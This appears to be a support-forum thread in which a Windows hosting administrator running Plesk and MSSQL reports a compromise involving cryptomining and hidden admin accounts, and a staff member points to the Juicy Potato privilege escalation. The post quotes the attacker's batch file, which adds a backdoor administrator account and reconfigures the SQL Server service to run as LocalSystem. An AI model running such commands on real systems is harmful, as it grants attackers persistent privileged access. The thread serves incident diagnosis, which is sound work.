Issue security issue on windows server 2019 to 2012

[httpdocs]

in my windows server with plesk obsidian and mssql 2019
I feel like I've been attacked by malware. There are two files in the C:\ProgramData\Application\Windows. File named runtime.bat with the following content:

net user PleskDeploy 123_Hoho /add & net localgroup administrators PleskDeploy /add
sc.exe config MSSQLSERVER obj= LocalSystem password= ""

sc stop MSSQLServer

sc start MSSQLServer

This is a hosting server.
The hacker enters the server through the bug of a website.
Transfers an executable file to C:\ProgramData\
With the access of the administrator, run this file and use the server for crypto mining.
In addition, a process called SERVICES.EXE engages all server memory. A user named PleskAdmin$ is created on the server with administrator access and is automatically deleted. plesk is installed on this server. Event Log also records a person's login report with the username PleskAdmin$ and deletes its logs.

Server and Plesk are completely updated.
No other software is installed on the server.
No such problem has been reported so far.

Now the question is:
How to transfer the file to the C:\ProgramData\ folder?
How to get administrator access in this folder and run the file?

This problem only occurs on Plesk servers,websitepanel server servers are without problems.

 

[IgorG]

In fact, we have the following privilege escalation recommendations Microsoft Windows Server 2008R2, Server 2012, Server 2012R2 and Server 2016 are vulnerable to Juicy Potato exploit
Make sure that you have applied this.
And I'd suggest you contact Plesk Support Team for performing detailed investigation this issue directly on your server.